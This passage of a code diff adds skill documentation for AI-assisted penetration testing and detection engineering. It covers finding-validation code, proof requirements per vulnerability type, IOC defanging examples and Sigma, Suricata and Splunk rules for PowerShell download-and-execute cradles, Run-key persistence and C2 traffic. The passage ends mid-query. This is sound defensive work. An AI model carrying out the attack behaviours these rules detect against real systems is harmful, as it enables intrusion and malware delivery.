+#### Scenario: Missing required field causes test failure
+
+- GIVEN a cybersecurity skill SKILL.md has frontmatter without a `description` field
+- WHEN `TestCyberSkillsHaveRequiredFrontmatter` runs
+- THEN the test fails
+- AND the failure message indicates the missing field and the file path
+
+---
+
+### Requirement: Skill Category Validation Tests
+
+The system MUST include a test that verifies every cybersecurity skill entry in the catalog has a valid category value: one of `red-team`, `blue-team`, `soc`, or `compliance`.
+
+#### Scenario: All catalog entries have valid categories
+
+- GIVEN `MVPCyberSkills()` returns the cyber skill catalog
+- WHEN `TestCyberSkillCategoriesAreValid` runs
+- THEN every entry's `Category` field is one of: `red-team`, `blue-team`, `soc`, `compliance`
+- AND no entry has an empty or unrecognized category
+
+#### Scenario: Invalid category is detected
+
+- GIVEN a cyber skill catalog entry has `Category: "pentest"` (not a valid category)
+- WHEN `TestCyberSkillCategoriesAreValid` runs
+- THEN the test fails
+- AND the failure message identifies the skill with the invalid category
+
+---
+
+### Requirement: Destructive Tool Manifest Tests
+
+The system MUST include a test that verifies every MCP manifest with `permission_tier: destructive` declares a non-empty `destructive_tools` array.
+
+#### Scenario: Destructive manifests declare destructive tools
+
+- GIVEN all MCP manifests under `mcps/`
+- WHEN `TestDestructiveToolsRequireConfirmation` runs
+- THEN every manifest with `permission_tier: destructive` has a `destructive_tools` array
+- AND the array is non-empty
+- AND every tool name in the array is a non-empty string
+
+#### Scenario: Manifests without destructive_tools field fail the test
+
+- GIVEN a manifest has `permission_tier: destructive` but no `destructive_tools` field
+- WHEN `TestDestructiveToolsRequireConfirmation` runs
+- THEN the test fails
+- AND the failure message names the manifest file
+
+---
+
+### Requirement: Prowler Check Reference Format Tests
+
+Any skill that references Prowler check IDs (in v1 or deferred for v2) MUST use check IDs matching the regex `^[a-z0-9_]+$`. The system SHALL include a test that scans skill content for Prowler check references and validates their format.
+
+#### Scenario: Valid Prowler check ID references pass
+
+- GIVEN a skill SKILL.md contains a reference like `check: iam_user_no_policies`
+- WHEN `TestProwlerCheckIDFormat` runs and scans the content
+- THEN the check ID `iam_user_no_policies` matches the expected format
+- AND the test passes
+
+#### Scenario: Invalid Prowler check ID format fails
+
+- GIVEN a skill SKILL.md contains a reference like `check: IAM-User-No-Policies` (uppercase, hyphens)
+- WHEN `TestProwlerCheckIDFormat` runs
+- THEN the test fails
+- AND the failure message identifies the malformed check ID and the file
+
+#### Scenario: Skills without Prowler check references skip cleanly
+
+- GIVEN a cybersecurity skill has no Prowler check ID references at all
+- WHEN `TestProwlerCheckIDFormat` scans the content
+- THEN the skill is skipped (not a failure)
+- AND no false positive is reported
+
+---
+
+### Requirement: Cyber Preset Test
+
+The system MUST include a test that verifies `PresetCyber` resolves to the correct set of components: full-gentleman base PLUS 11 cyber skills PLUS 3 cyber MCPs PLUS gentleman-soc agent augmentation.
+
+#### Scenario: Cyber preset includes expected components
+
+- GIVEN `PresetCyber` is used to compute the component set
+- WHEN `componentsForPreset(model.PresetCyber)` is called
+- THEN all full-gentleman components are present
+- AND 11 cyber skills are in the skill list
+- AND kali-mcp, shodan-mcp, and virustotal-mcp are in the MCP list
+- AND gentleman-soc agent content is flagged for injection
+
+#### Scenario: Cyber preset component count is deterministic
+
+- GIVEN `PresetCyber` is used twice in succession
+- WHEN the component set is computed each time
+- THEN both results are identical (same components, same order)
+- AND no random or environment-dependent components appear
+
+---
+
+### Requirement: No Regression on Existing Tests
+
+All existing gentle-ai tests MUST continue to pass when the cybersecurity additions are present. The test suite SHALL be run with `go test ./...` and SHALL produce zero failures.
+
+#### Scenario: Full test suite passes with cyber additions
+
+- GIVEN the cybersecurity fork with all additions compiled
+- WHEN `go test ./...` is executed
+- THEN zero test failures are reported
+- AND zero test panics occur
+- AND all existing test files compile without modification
+
+#### Scenario: Existing catalog tests still pass
+
+- GIVEN the cybersecurity additions to `internal/catalog/`
+- WHEN `go test ./internal/catalog/...` is executed
+- THEN all pre-existing tests pass
+- AND new cyber tests pass independently
+
+---
+
+### Requirement: BDD Scenario Traceability
+
+Every Gherkin-style scenario in these specs SHALL be traceable to at least one automated test in the test suite. The mapping is documented in test comments referencing the spec requirement.
+
+#### Scenario: Each spec scenario has a corresponding test
+
+- GIVEN the spec document for any cybersecurity domain
+- WHEN the test suite is audited
+- THEN for each `#### Scenario:` heading in the specs, at least one test function exists
+- AND the test function has a comment referencing the spec requirement name

--- a/skills/ai-pentesting-validation/SKILL.md
+++ b/skills/ai-pentesting-validation/SKILL.md
@@ -1,0 +1,374 @@
+---
+name: ai-pentesting-validation
+description: Anti-hallucination validation pipeline for AI-driven penetration testing. Use when building or reviewing AI agents that perform security assessments to prevent false positives, validate findings with proof-of-execution, and score confidence levels on discovered vulnerabilities.
+category: red-team
+---
+
+# AI Pentesting Validation
+
+Prevent AI hallucinations in automated penetration testing by implementing validation pipelines, negative controls, proof-of-execution checks, and confidence scoring.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Build AI agents that perform automated security testing
+- Validate that AI-reported vulnerabilities are **real**, not hallucinated
+- Implement **negative control** testing alongside active scans
+- Create **proof-of-execution** verification for findings
+- Score **confidence levels** (0-100) on AI-generated findings
+- Design **validation judges** that approve or reject findings
+- Prevent false positives in automated pentesting pipelines
+
+## The Hallucination Problem in AI Pentesting
+
+AI models can confidently report vulnerabilities that don't exist. In pentesting, a false positive wastes IR resources, damages credibility, and can cause unnecessary panic.
+
+**Common hallucination patterns:**
+- Reporting SQLi on endpoints that return static HTML
+- Claiming XSS on pages with proper CSP headers
+- Declaring RCE without proof of command execution
+- Inventing response content that wasn't in the actual HTTP response
+
+## Anti-Hallucination Pipeline
+
+### Architecture Overview
+
+```
+Finding Generated
+       │
+       ▼
+┌─────────────────┐
+│ Negative Control │──── Sends BENIGN request to same endpoint
+│   Engine         │     If benign triggers same "vuln" → FALSE POSITIVE
+└───────┬─────────┘
+        │ Pass
+        ▼
+┌─────────────────┐
+│ Proof of         │──── Verifies exploit actually worked
+│ Execution Check  │     Checks response for REAL evidence
+└───────┬─────────┘
+        │ Pass
+        ▼
+┌─────────────────┐
+│ Confidence       │──── Scores 0-100 based on multiple signals
+│ Scorer           │     Threshold: typically 60+
+└───────┬─────────┘
+        │ Pass
+        ▼
+┌─────────────────┐
+│ Validation       │──── SOLE authority to approve/reject
+│ Judge            │     No finding enters report without approval
+└───────┬─────────┘
+        │ Approved
+        ▼
+   Valid Finding
+```
+
+### 1. Negative Control Engine
+
+Send a **benign request** to the same endpoint. If the benign request triggers the same detection as the malicious one, the finding is a false positive.
+
+**Principle:** A vulnerability scanner that alerts on normal traffic is broken.
+
+```python
+# Negative control pattern
+class NegativeControl:
+    """
+    For every test payload, also send a benign equivalent.
+    If both trigger the same response pattern, it's a false positive.
+    """
+
+    BENIGN_EQUIVALENTS = {
+        "sqli": [
+            "normal search term",
+            "hello world",
+            "test123",
+        ],
+        "xss": [
+            "normal text without tags",
+            "search query here",
+        ],
+        "command_injection": [
+            "normal-filename.txt",
+            "regular input",
+        ],
+        "path_traversal": [
+            "images/logo.png",
+            "docs/readme.txt",
+        ],
+    }
+
+    def validate(self, vuln_type, endpoint, malicious_response):
+        """
+        Returns True if finding is valid (benign does NOT trigger).
+        Returns False if finding is false positive.
+        """
+        benign_inputs = self.BENIGN_EQUIVALENTS.get(vuln_type, ["test"])
+
+        for benign in benign_inputs:
+            benign_response = self.send_request(endpoint, benign)
+
+            if self.responses_match(malicious_response, benign_response):
+                return False  # FALSE POSITIVE: benign triggers same behavior
+
+        return True  # Valid: only malicious input triggers the behavior
+```
+
+**Key rules:**
+- ALWAYS test the negative control BEFORE confirming a finding
+- Use at least 2-3 benign inputs per vulnerability type
+- Compare response codes, body patterns, AND timing
+- If ANY benign input triggers the same pattern, reject the finding
+
+### 2. Proof-of-Execution Verification
+
+Every vulnerability type needs a **specific proof** that the exploit worked. The AI can't just say "I think it's vulnerable" - it needs evidence.
+
+```yaml
+# Proof requirements per vulnerability type
+proof_requirements:
+  sqli:
+    - Response contains database error message (specific DB engine)
+    - UNION SELECT returns controlled data in response
+    - Boolean blind: measurable response difference (size/content)
+    - Time blind: measurable time delay (>3s difference)
+
+  xss_reflected:
+    - Exact payload appears unencoded in response body
+    - Payload is inside executable context (not inside HTML comment/attribute)
+    - Content-Type is text/html (not JSON or plain text)
+    - No CSP header blocks inline scripts
+
+  xss_stored:
+    - Payload persists across requests (verify on fresh session)
+    - Payload renders in victim context (not admin-only page)
+
+  command_injection:
+    - Output of injected command appears in response
+    - Time-based: measurable delay from sleep/ping command
+    - Out-of-band: DNS/HTTP callback received
+
+  ssrf:
+    - Internal service response data appears in response
+    - Out-of-band: callback received from target server
+    - Cloud metadata endpoint data returned
+
+  path_traversal:
+    - Known file content appears in response (/etc/passwd, win.ini)
+    - Content matches expected format for that file
+
+  idor:
+    - Data from another user/resource is accessible
+    - Verified with at least 2 different unauthorized IDs
+    - Compared with authorized response to confirm difference
+
+  authentication_bypass:
+    - Protected resource accessible without credentials
+    - Session/token validation skipped
+    - Verified by comparing with authenticated vs unauthenticated
+```
+
+**Implementation pattern:**
+
+```python
+class ProofOfExecution:
+    """
+    Validates that a vulnerability finding has concrete proof.
+    Returns proof_found (bool) and proof_details (str).
+    """
+
+    def verify_sqli(self, response, payload_type):
+        if payload_type == "error_based":
+            # Look for REAL database error patterns
+            db_errors = [
+                r"SQL syntax.*MySQL",
+                r"ORA-\d{5}",
+                r"PostgreSQL.*ERROR",
+                r"Microsoft.*ODBC.*SQL Server",
+                r"sqlite3\.OperationalError",
+            ]
+            for pattern in db_errors:
+                if re.search(pattern, response.text, re.IGNORECASE):
+                    return True, f"DB error found: {pattern}"
+
+            return False, "No database error pattern in response"
+
+        elif payload_type == "union_based":
+            # Verify controlled data appears in response
+            marker = "GLITCH_MARKER_12345"
+            if marker in response.text:
+                return True, f"UNION marker '{marker}' found in response"
+            return False, "UNION marker not in response"
+
+        elif payload_type == "time_based":
+            # Verify measurable time difference
+            if response.elapsed.total_seconds() > 5.0:
+                return True, f"Time delay: {response.elapsed.total_seconds()}s"
+            return False, f"No significant delay: {response.elapsed.total_seconds()}s"
+
+    def verify_xss(self, response, payload):
+        # Payload must appear UNENCODED
+        if payload not in response.text:
+            return False, "Payload not found unencoded in response"
+
+        # Must be in HTML context
+        content_type = response.headers.get("Content-Type", "")
+        if "text/html" not in content_type:
+            return False, f"Response is {content_type}, not HTML"
+
+        # Check CSP
+        csp = response.headers.get("Content-Security-Policy", "")
+        if "script-src" in csp and "'unsafe-inline'" not in csp:
+            return False, "CSP blocks inline scripts"
+
+        return True, "Payload renders unencoded in HTML without CSP block"
+```
+
+### 3. Confidence Scoring
+
+Score findings on a 0-100 scale using multiple signals. Don't rely on a single indicator.
+
+```yaml
+scoring_signals:
+  response_code_match:
+    description: "Expected HTTP status code returned"
+    weight: 10
+    example: "500 for SQLi error, 200 for reflected XSS"
+
+  payload_in_response:
+    description: "Exact payload or marker found in response body"
+    weight: 25
+    example: "UNION SELECT marker appears in HTML"
+
+  negative_control_passed:
+    description: "Benign input does NOT trigger same behavior"
+    weight: 25
+    example: "Normal search returns 200, SQLi payload returns 500"
+
+  response_diff_significant:
+    description: "Measurable difference between baseline and exploit response"
+    weight: 15
+    example: "Response size differs by >20%, timing differs by >3s"
+
+  error_pattern_specific:
+    description: "Error message is specific to vulnerability type"
+    weight: 15
+    example: "MySQL syntax error, not generic 500 page"
+
+  reproducible:
+    description: "Finding reproduces on retry (not transient)"
+    weight: 10
+    example: "3/3 attempts return same vulnerable response"
+
+# Confidence thresholds
+thresholds:
+  confirmed: 80    # High confidence, include in report
+  probable: 60     # Medium confidence, include with caveat
+  possible: 40     # Low confidence, needs manual verification
+  rejected: 0-39   # Too low, do not report
+```
+
+**Scoring implementation:**
+
+```python
+class ConfidenceScorer:
+    def score(self, finding):
+        total = 0
+
+        if finding.response_code_expected:
+            total += 10
+        if finding.payload_in_response:
+            total += 25
+        if finding.negative_control_passed:
+            total += 25
+        if finding.response_diff > 0.2:  # >20% difference
+            total += 15
+        if finding.error_pattern_matched:
+            total += 15
+        if finding.reproduced_count >= 2:
+            total += 10
+
+        finding.confidence = total
+        return total
+```
+
+### 4. Validation Judge
+
+The **sole authority** for approving findings. No vulnerability enters the report without passing the judge.
+
+```python
+class ValidationJudge:
+    """
+    Final gate before a finding is accepted.
+    Combines all validation signals into a pass/fail decision.
+    """
+
+    MINIMUM_CONFIDENCE = 60
+
+    def judge(self, finding):
+        verdict = {
+            "approved": False,
+            "reason": "",
+            "confidence": finding.confidence,
+        }
+
+        # Hard rejections (instant fail)
+        if not finding.negative_control_passed:
+            verdict["reason"] = "REJECTED: Failed negative control"
+            return verdict
+
+        if not finding.proof_of_execution:
+            verdict["reason"] = "REJECTED: No proof of execution"
+            return verdict
+
+        if finding.confidence < self.MINIMUM_CONFIDENCE:
+            verdict["reason"] = f"REJECTED: Confidence {finding.confidence} < {self.MINIMUM_CONFIDENCE}"
+            return verdict
+
+        # Passed all checks
+        verdict["approved"] = True
+        verdict["reason"] = f"APPROVED: Confidence {finding.confidence}, proof verified"
+        return verdict
+```
+
+## System Prompts for AI Pentest Agents
+
+When using LLMs to drive pentesting, add these constraints to system prompts:
+
+```markdown
+## Validation Rules (MANDATORY)
+
+1. NEVER report a vulnerability without proof-of-execution
+2. ALWAYS run negative control before confirming a finding
+3. NEVER fabricate response content - quote EXACT bytes from responses
+4. If confidence is below 60, mark as "needs manual verification"
+5. ALWAYS include the exact HTTP request and response in findings
+6. NEVER assume a vulnerability exists based on endpoint naming alone
+7. If you cannot verify a finding, say "unconfirmed" - never "confirmed"
+8. Rate limiting or WAF blocks are NOT vulnerabilities
+9. Missing headers (X-Frame-Options, etc.) are informational, not vulnerabilities
+10. Self-signed certificates in test environments are NOT findings
+```
+
+## Quality Checklist
+
+Before accepting AI-generated pentest findings:
+
+- [ ] Negative control sent and passed (benign input doesn't trigger)
+- [ ] Proof-of-execution verified with concrete evidence
+- [ ] Confidence score calculated (minimum 60 for report inclusion)
+- [ ] Validation judge approved the finding
+- [ ] Exact HTTP request/response included (not AI-generated summary)
+- [ ] Finding is reproducible (tested at least twice)
+- [ ] MITRE ATT&CK technique mapped
+- [ ] Severity matches actual impact (not AI's initial assessment)
+- [ ] No duplicate findings (same vuln, different payloads)
+- [ ] False positive rate monitored across scan session
+
+## Integration Points
+
+This skill integrates with:
+- **detection-engineer** - Validated findings feed into Sigma/Suricata rule creation
+- **exploit-chain-patterns** - Validated findings are inputs for chain analysis
+- **pentest-orchestrator** - Validation pipeline is a core component of orchestration
+- **malware-report-writer** - Report templates include validation status per finding

--- a/skills/ai-pentesting-validation/SKILL.md
+++ b/skills/ai-pentesting-validation/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: ai-pentesting-validation
-description: Anti-hallucination validation pipeline for AI-driven penetration testing. Use when building or reviewing AI agents that perform security assessments to prevent false positives, validate findings with proof-of-execution, and score confidence levels on discovered vulnerabilities.
-category: red-team
+description: "Validate AI pentest findings to prevent hallucinations. Trigger: building security agents, preventing false positives, or scoring vulnerability confidence."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # AI Pentesting Validation
@@ -372,3 +375,13 @@ This skill integrates with:
 - **exploit-chain-patterns** - Validated findings are inputs for chain analysis
 - **pentest-orchestrator** - Validation pipeline is a core component of orchestration
 - **malware-report-writer** - Report templates include validation status per finding
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Pipeline test**: Verify all four validation stages (negative control, proof-of-execution, confidence scoring, validation judge) are documented with working code examples.
+3. **Proof requirements test**: Check that proof_requirements YAML for each vulnerability type is syntactically valid.
+4. **Scoring test**: Validate the confidence scoring weights sum correctly and thresholds are defined.
+5. **Integration test**: Confirm referenced skills (detection-engineer, exploit-chain-patterns, pentest-orchestrator) exist.

--- a/skills/detection-engineer/SKILL.md
+++ b/skills/detection-engineer/SKILL.md
@@ -1,0 +1,797 @@
+---
+name: detection-engineer
+description: Create detection rules and hunting queries from malware analysis findings. Use when you need to write Sigma rules for SIEM, Suricata rules for network IDS, defang IOCs for safe sharing, or convert analysis findings into actionable detection content for SOC teams and threat hunters.
+category: blue-team
+---
+
+# Detection Engineer
+
+Transform malware analysis findings into production-ready detection rules, hunting queries, and operationalized IOCs.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Create YARA rules from malware samples (already covered in malware-report-writer)
+- Write **Sigma rules** for SIEM detection (Splunk, Elastic, QRadar)
+- Create **Suricata/Snort rules** for network IDS/IPS
+- Generate **hunting queries** for EDR platforms
+- **Defang IOCs** for safe documentation and sharing
+- Convert IOCs to **standard formats** (STIX, OpenIOC, CSV)
+- Assess **IOC confidence levels** and volatility
+- Create **detection logic** from behavioral analysis
+- Write **threat hunting hypotheses**
+
+## IOC Management & Defanging
+
+### Why Defang IOCs?
+
+**Problem:** Live IOCs in reports can be:
+- Accidentally clicked (execute malware)
+- Automatically crawled by bots
+- Trigger security tools (email filters, DLP)
+
+**Solution:** Defang (neutralize) IOCs for safe sharing.
+
+### Defanging Patterns
+
+```bash
+# URLs
+http://malicious.com/payload.exe
+→ hxxp://malicious[.]com/payload[.]exe
+
+https://evil.tk/login
+→ hxxps://evil[.]tk/login
+
+# Domains
+malicious.com
+→ malicious[.]com
+
+c2-server.example.org
+→ c2-server[.]example[.]org
+
+# IPs
+192.168.1.100
+→ 192[.]168[.]1[.]100
+
+10.0.0.50
+→ 10[.]0[.]0[.]50
+
+# Email addresses
+attacker@evil.com
+→ attacker[@]evil[.]com
+
+phishing@malware.tk
+→ phishing[@]malware[.]tk
+
+# File paths (optional)
+C:\Windows\System32\malware.exe
+→ C:\Windows\System32\malware[.]exe
+```
+
+### Automated Defanging
+
+**Tool: ioc-fanger (Python)**
+```bash
+# Install
+pip install ioc-fanger
+
+# Defang
+echo "http://malicious.com" | fanger --defang
+# Output: hxxp://malicious[.]com
+
+# Refang (restore for testing)
+echo "hxxp://malicious[.]com" | fanger --fang
+# Output: http://malicious.com
+```
+
+**Manual sed/awk:**
+```bash
+# Defang URLs and domains
+echo "http://malicious.com/payload.exe" | sed 's/http:/hxxp:/g; s/\./[.]/g'
+
+# Defang IPs
+echo "192.168.1.100" | sed 's/\./[.]/g'
+
+# Defang emails
+echo "attacker@evil.com" | sed 's/@/[@]/g; s/\./[.]/g'
+```
+
+### IOC Confidence & Volatility Assessment
+
+| IOC Type | Confidence | Volatility | Reasoning |
+|----------|------------|------------|-----------|
+| **File Hash (SHA256)** | High | Static | Unique to sample, won't change |
+| **Mutex Name** | High | Static | Hardcoded in malware |
+| **PDB Path** | High | Static | Compilation artifact |
+| **Registry Key** | High | Static | Persistence mechanism |
+| **Certificate Hash** | High | Static | Code signing certificate |
+| **IP Address** | Medium | Dynamic | Can change (DGA, fast-flux, hosting) |
+| **Domain (C2)** | Medium | Dynamic | May rotate frequently |
+| **URL Path** | Low-Medium | Dynamic | Often dynamic or timestamped |
+| **User-Agent** | Low | Dynamic | Common strings, high FP rate |
+| **File Path** | Medium | Static | May vary by environment |
+| **Process Name** | Low | Dynamic | Easily changed by attacker |
+
+**Label IOCs appropriately:**
+```markdown
+### Network Indicators (Medium Confidence - Dynamic)
+- Domain: malicious[.]com (C2 server - may rotate)
+- IP: 192[.]168[.]1[.]100 (C2 IP - may change)
+
+### Host Indicators (High Confidence - Static)
+- Mutex: Global\UniqueMalwareMutex
+- Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Malware
+- File Hash: abc123... (SHA256)
+```
+
+---
+
+## Sigma Rule Creation (SIEM Detection)
+
+### What is Sigma?
+
+Sigma is a **generic signature format for SIEM systems**. Write once, convert to Splunk/Elastic/QRadar/ArcSight queries.
+
+**Official Repo:** https://github.com/SigmaHQ/sigma
+
+### Sigma Rule Structure
+
+```yaml
+title: Short Descriptive Title
+id: unique-uuid-for-this-rule
+status: experimental | test | stable
+description: Detailed description of what this detects
+references:
+    - https://attack.mitre.org/techniques/T1059/001/
+author: Your Name
+date: 2025-10-26
+tags:
+    - attack.execution
+    - attack.t1059.001
+logsource:
+    category: process_creation  # or network_connection, file_event, etc.
+    product: windows
+detection:
+    selection:
+        Image|endswith: '\powershell.exe'
+        CommandLine|contains|all:
+            - 'DownloadString'
+            - 'Invoke-Expression'
+    condition: selection
+falsepositives:
+    - Legitimate administrative scripts
+level: high  # informational, low, medium, high, critical
+```
+
+### Common Sigma Logsources
+
+| Category | Product | Event Source | Use Case |
+|----------|---------|--------------|----------|
+| `process_creation` | windows | Sysmon Event ID 1, Security 4688 | Process execution |
+| `network_connection` | windows | Sysmon Event ID 3 | Network activity |
+| `file_event` | windows | Sysmon Event ID 11 | File creation |
+| `registry_event` | windows | Sysmon Event ID 12/13/14 | Registry modifications |
+| `image_load` | windows | Sysmon Event ID 7 | DLL loading |
+| `create_remote_thread` | windows | Sysmon Event ID 8 | Process injection |
+| `dns_query` | windows | Sysmon Event ID 22 | DNS queries |
+
+### Sigma Modifiers
+
+**String Matching:**
+- `|contains` - String contains value
+- `|startswith` - String starts with value
+- `|endswith` - String ends with value
+- `|all` - All values must be present
+- `|re` - Regular expression match
+
+**Examples:**
+```yaml
+# Contains any
+CommandLine|contains:
+    - 'powershell'
+    - 'cmd.exe'
+
+# Contains all
+CommandLine|contains|all:
+    - 'Invoke-WebRequest'
+    - '-OutFile'
+
+# Ends with
+Image|endswith: '\rundll32.exe'
+
+# Starts with
+CommandLine|startswith: 'C:\Windows\System32\'
+
+# Regex
+CommandLine|re: '.*\\\\AppData\\\\Local\\\\Temp\\\\[a-z]{8}\.exe'
+```
+
+### Example 1: PowerShell Download Cradle
+
+```yaml
+title: Suspicious PowerShell Download and Execute
+id: 12345678-1234-1234-1234-123456789abc
+status: experimental
+description: Detects PowerShell downloading content and executing it via Invoke-Expression
+references:
+    - https://attack.mitre.org/techniques/T1059/001/
+    - https://attack.mitre.org/techniques/T1105/
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.execution
+    - attack.t1059.001
+    - attack.command_and_control
+    - attack.t1105
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection:
+        Image|endswith:
+            - '\powershell.exe'
+            - '\pwsh.exe'
+        CommandLine|contains|all:
+            - 'DownloadString'
+            - 'IEX'
+    condition: selection
+falsepositives:
+    - Legitimate software deployment scripts
+    - Administrative automation
+level: high
+```
+
+### Example 2: Suspicious Registry Run Key
+
+```yaml
+title: Malware Persistence via Registry Run Key
+id: 23456789-2345-2345-2345-234567890abc
+status: stable
+description: Detects creation of registry Run key pointing to suspicious locations
+references:
+    - https://attack.mitre.org/techniques/T1547/001/
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.persistence
+    - attack.t1547.001
+logsource:
+    category: registry_event
+    product: windows
+detection:
+    selection:
+        EventType: SetValue
+        TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\'
+        Details|contains:
+            - '\AppData\Local\Temp\'
+            - '\Users\Public\'
+            - '\ProgramData\'
+            - '%TEMP%'
+    condition: selection
+falsepositives:
+    - Legitimate software installations
+level: medium
+```
+
+### Example 3: Network Connection to Malicious IP
+
+```yaml
+title: Network Connection to Known C2 Server
+id: 34567890-3456-3456-3456-345678901abc
+status: experimental
+description: Detects network connection to known malware C2 IP address
+references:
+    - Internal malware analysis report
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.command_and_control
+    - attack.t1071
+logsource:
+    category: network_connection
+    product: windows
+detection:
+    selection:
+        DestinationIp:
+            - '192.168.56.101'  # Replace with actual C2 IP
+            - '10.0.0.50'
+        DestinationPort:
+            - 443
+            - 8080
+    condition: selection
+falsepositives:
+    - Rare, should be investigated
+level: high
+```
+
+### Example 4: Suspicious File Creation
+
+```yaml
+title: Malware Dropping Files to Suspicious Location
+id: 45678901-4567-4567-4567-456789012abc
+status: experimental
+description: Detects file creation in common malware drop locations
+references:
+    - https://attack.mitre.org/techniques/T1105/
+author: Analyst Name
+date: 2025-10-26
+tags:
+    - attack.defense_evasion
+    - attack.t1105
+logsource:
+    category: file_event
+    product: windows
+detection:
+    selection:
+        TargetFilename|contains:
+            - '\AppData\Local\Temp\'
+            - '\Users\Public\'
+        TargetFilename|endswith:
+            - '.exe'
+            - '.dll'
+            - '.bat'
+            - '.vbs'
+    condition: selection
+falsepositives:
+    - Software installations
+    - Temporary file creation by legitimate apps
+level: low
+```
+
+### Convert Sigma to SIEM Queries
+
+**Using sigmac (legacy) or sigma-cli (modern):**
+
+```bash
+# Install sigma-cli
+pip install sigma-cli
+
+# Convert to Splunk
+sigma convert -t splunk rule.yml
+
+# Convert to Elastic
+sigma convert -t elasticsearch rule.yml
+
+# Convert to QRadar
+sigma convert -t qradar rule.yml
+
+# Convert to Microsoft Sentinel
+sigma convert -t sentinel rule.yml
+```
+
+**Example Conversions:**
+
+**Splunk:**
+```spl
+index=windows EventCode=1
+(Image="*\\powershell.exe" OR Image="*\\pwsh.exe")
+CommandLine="*DownloadString*" CommandLine="*IEX*"
+```
+
+**Elastic:**
+```json
+{
+  "query": {
+    "bool": {
+      "must": [
+        {"wildcard": {"process.executable": "*\\\\powershell.exe"}},
+        {"wildcard": {"process.command_line": "*DownloadString*"}},
+        {"wildcard": {"process.command_line": "*IEX*"}}
+      ]
+    }
+  }
+}
+```
+
+### Sigma Rule Best Practices
+
+**Do:**
+- Use unique UUIDs (generate with `uuidgen` or online)
+- Include MITRE ATT&CK tags
+- List realistic false positives
+- Test on real data before deployment
+- Use specific conditions (avoid over-matching)
+- Document references and context
+- Set appropriate severity levels
+
+**Don't:**
+- Use overly broad conditions
+- Forget false positive analysis
+- Skip testing
+- Hardcode environment-specific values
+- Ignore performance impact
+
+---
+
+## Suricata Rule Creation (Network IDS)
+
+### Suricata Rule Structure
+
+```
+action protocol src_ip src_port -> dest_ip dest_port (rule_options)
+```
+
+**Components:**
+- **Action**: alert, drop, reject, pass
+- **Protocol**: tcp, udp, icmp, http, dns, tls
+- **Src/Dest**: IP ranges, ports, $variables
+- **Rule Options**: Keywords that define detection logic
+
+### Example 1: HTTP C2 Traffic
+
+```
+alert http $HOME_NET any -> $EXTERNAL_NET any (
+    msg:"ET MALWARE Suspicious C2 Checkin";
+    flow:established,to_server;
+    content:"POST"; http_method;
+    content:"/api/checkin"; http_uri;
+    http.user_agent; content:"Mozilla/4.0 (compatible|3b| MSIE 6.0)";
+    sid:1000001;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+**Breakdown:**
+- `alert http` - Alert on HTTP traffic
+- `$HOME_NET any -> $EXTERNAL_NET any` - Outbound traffic
+- `flow:established,to_server` - Established connection to server
+- `content:"POST"; http_method` - HTTP POST request
+- `content:"/api/checkin"; http_uri` - Specific URI path
+- `http.user_agent; content:"..."` - Specific User-Agent
+- `sid:1000001` - Signature ID (use 1000000+ for custom rules)
+- `rev:1` - Revision number
+
+### Example 2: DNS C2 Communication
+
+```
+alert dns $HOME_NET any -> any 53 (
+    msg:"ET MALWARE Suspicious DGA Domain Query";
+    dns.query; content:".tk"; nocase;
+    sid:1000002;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+### Example 3: TLS C2 with SNI
+
+```
+alert tls $HOME_NET any -> $EXTERNAL_NET 443 (
+    msg:"ET MALWARE Known C2 Server Certificate";
+    tls.sni; content:"malicious.com";
+    tls.cert_subject; content:"CN=Evil Corp";
+    sid:1000003;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+### Example 4: Malware Download
+
+```
+alert http $HOME_NET any -> $EXTERNAL_NET any (
+    msg:"ET MALWARE Executable Download from Suspicious TLD";
+    flow:established,to_server;
+    http.uri; content:".exe"; endswith;
+    http.host; content:".tk"; endswith;
+    sid:1000004;
+    rev:1;
+    metadata:created_at 2025_10_26;
+)
+```
+
+### Suricata HTTP Keywords
+
+- `http.method` - GET, POST, PUT, etc.
+- `http.uri` - Request URI path
+- `http.host` - Host header
+- `http.user_agent` - User-Agent string
+- `http.request_body` - POST data
+- `http.response_body` - Response content
+- `http.header` - Any HTTP header
+- `http.stat_code` - Response code (200, 404, etc.)
+
+### Suricata DNS Keywords
+
+- `dns.query` - DNS query name
+- `dns.opcode` - DNS operation code
+- `dns.rcode` - DNS response code
+
+### Suricata TLS Keywords
+
+- `tls.sni` - Server Name Indication
+- `tls.cert_subject` - Certificate subject
+- `tls.cert_issuer` - Certificate issuer
+- `tls.cert_serial` - Certificate serial number
+- `tls.version` - TLS version
+
+### Testing Suricata Rules
+
+```bash
+# Test rule syntax
+suricata -T -c /etc/suricata/suricata.yaml -S custom.rules
+
+# Run on PCAP
+suricata -r sample_traffic.pcapng -S custom.rules -l /var/log/suricata/
+
+# Check alerts
+cat /var/log/suricata/fast.log
+```
+
+### Suricata Best Practices
+
+**Do:**
+- Use flow keywords (established, to_server, to_client)
+- Anchor strings with content modifiers (startswith, endswith)
+- Use fast_pattern for performance
+- Test against PCAPs before deployment
+- Use metadata for rule management
+- Include revision tracking
+
+**Don't:**
+- Write overly broad rules (high false positive rate)
+- Use regex unless necessary (performance impact)
+- Forget to test on benign traffic
+- Use conflicting SIDs (must be unique)
+- Skip documentation in msg field
+
+---
+
+## Hunting Queries
+
+### Splunk Hunting Queries
+
+**Hunt for PowerShell Download Cradles:**
+```spl
+index=windows EventCode=1
+(Image="*\\powershell.exe" OR Image="*\\pwsh.exe")
+(CommandLine="*DownloadString*" OR CommandLine="*DownloadFile*" OR CommandLine="*Invoke-WebRequest*")
+| table _time, ComputerName, User, CommandLine
+| sort -_time
+```
+
+**Hunt for Suspicious Registry Run Keys:**
+```spl
+index=windows EventCode=13
